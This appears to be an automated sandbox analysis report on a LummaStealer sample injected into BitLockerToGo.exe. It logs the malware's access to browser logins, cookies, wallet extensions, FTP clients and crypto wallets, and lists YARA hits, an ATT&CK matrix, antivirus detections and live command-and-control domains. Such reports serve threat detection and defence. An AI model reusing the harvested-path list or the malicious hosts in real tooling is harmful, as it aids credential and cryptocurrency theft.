Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe -> File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Directory queried: C:\Users\user\Documents
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: Yara match | File source: 00000002.00000003.1951968090.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1983486359.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1982657253.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1981505063.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1983200877.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1983911161.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1981900349.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1982913303.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1983703963.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1996190492.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1982143036.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: BitLockerToGo.exe PID: 2676, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: BitLockerToGo.exe PID: 2676, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
MITRE ATT&CK matrix (a number before a technique is the count of matched signatures for it):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 11 Virtualization/Sandbox Evasion | 2 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Screen Capture | 21 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 311 Process Injection | 311 Process Injection | LSASS Memory | 241 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | Logon Script (Windows) | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | Security Account Manager | 11 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 41 Data from Local System | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 31 Obfuscated Files or Information | NTDS | 1 Process Discovery | Distributed Component Object Model | 2 Clipboard Data | 114 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Software Packing | LSA Secrets | 12 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 46 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
Antivirus detection for the submitted sample:

Source | Detection | Scanner | Label | Link
HLZwUhcJ28.exe | 50% | ReversingLabs | Win64.Trojan.LummaStealer |
HLZwUhcJ28.exe | 100% | Avira | TR/Redcap.dcvcm |

Antivirus detection for dropped files:

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe | 100% | Avira | TR/Redcap.tpgxx |
C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe | 83% | ReversingLabs | Win32.Trojan.LummaStealer |
C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\Qt5GuiVBox.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\Qt5SqlVBox.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\Security-Common.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\VBoxClient-x86.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\VBoxProxyStub-x86.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\cygwin1.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\libiconv-2.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\libidn2-0.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\libintl-8.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay\qsqlite.dll | 0% | ReversingLabs | |

No Antivirus matches

No Antivirus matches
Source | Detection | Scanner | Label | Link
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe |
https://player.vimeo.com | 0% | URL Reputation | safe |
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe |
https://store.steampowered.com/subscriber_agreement/ | 0% | URL Reputation | safe |
https://www.gstatic.cn/recaptcha/ | 0% | URL Reputation | safe |
http://www.valvesoftware.com/legal.htm | 0% | URL Reputation | safe |
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | 0% | URL Reputation | safe |
https://steam.tv/ | 0% | URL Reputation | safe |
http://store.steampowered.com/privacy_agreement/ | 0% | URL Reputation | safe |
https://store.steampowered.com/points/shop/ | 0% | URL Reputation | safe |
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe |
http://crl.rootca1.amazontrust.com/rootca1.crl0 | 0% | URL Reputation | safe |
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | 0% | URL Reputation | safe |
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
https://lv.queniujq.cn | 0% | URL Reputation | safe |
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | 0% | URL Reputation | safe |
https://store.steampowered.com/privacy_agreement/ | 0% | URL Reputation | safe |
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png | 0% | URL Reputation | safe |
https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016 | 0% | URL Reputation | safe |
https://checkout.steampowered.com/ | 0% | URL Reputation | safe |
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png | 0% | URL Reputation | safe |
https://store.steampowered.com/; | 0% | URL Reputation | safe |
https://store.steampowered.com/about/ | 0% | URL Reputation | safe |
https://help.steampowered.com/en/ | 0% | URL Reputation | safe |
https://store.steampowered.com/news/ | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
http://store.steampowered.com/subscriber_agreement/ | 0% | URL Reputation | safe |
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | 0% | URL Reputation | safe |
https://recaptcha.net/recaptcha/; | 0% | URL Reputation | safe |
https://store.steampowered.com/stats/ | 0% | URL Reputation | safe |
https://medal.tv | 0% | URL Reputation | safe |
https://broadcast.st.dl.eccdnx.com | 0% | URL Reputation | safe |
https://store.steampowered.com/steam_refunds/ | 0% | URL Reputation | safe |
http://x1.c.lencr.org/0 | 0% | URL Reputation | safe |
http://x1.i.lencr.org/0 | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
Contacted domains:

Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 104.102.49.254 | true | true | | unknown
villagedguy.cyou | 104.21.32.196 | true | true | | unknown
wrigglesight.sbs | unknown | unknown | true | | unknown
ferrycheatyk.sbs | unknown | unknown | true | | unknown
deepymouthi.sbs | unknown | unknown | true | | unknown
monstourtu.sbs | unknown | unknown | true | | unknown
captaitwik.sbs | unknown | unknown | true | | unknown
snailyeductyi.sbs | unknown | unknown | true | | unknown
heroicmint.sbs | unknown | unknown | true | | unknown
sidercotay.sbs | unknown | unknown | true | | unknown
Contacted URLs:

Name | Malicious | Antivirus Detection | Reputation
wrigglesight.sbs | true | | unknown
heroicmint.sbs | true | | unknown
ferrycheatyk.sbs | true | | unknown
https://steamcommunity.com/profiles/76561199724331900 | true | | unknown
deepymouthi.sbs | true | | unknown
sidercotay.sbs | true | | unknown
https://villagedguy.cyou/api | true | | unknown
URLs found in memory and binary data:

Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | BitLockerToGo.exe, 00000002.00000003.1925016440.0000000005079000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://player.vimeo.com | BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | BitLockerToGo.exe, 00000002.00000003.1925016440.0000000005079000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://villagedguy.cyou/apibu0 | BitLockerToGo.exe, 00000002.00000002.2038989446.0000000002D1E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://steamcommunity.com/?subsection=broadcasts | BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV | BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://github.com/golang/protobuf/issues/1609): | Imperial_Delay.exe | false | | unknown
https://store.steampowered.com/subscriber_agreement/ | BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.gstatic.cn/recaptcha/ | BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=UuGFpt56D9L4&amp;l= | BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=engli | BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://github.com/zitadel/zitadel/blob/new-eventstore/cmd/zitadel/startup.yaml. | Imperial_Delay.exe | false | | unknown
https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&amp; | BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
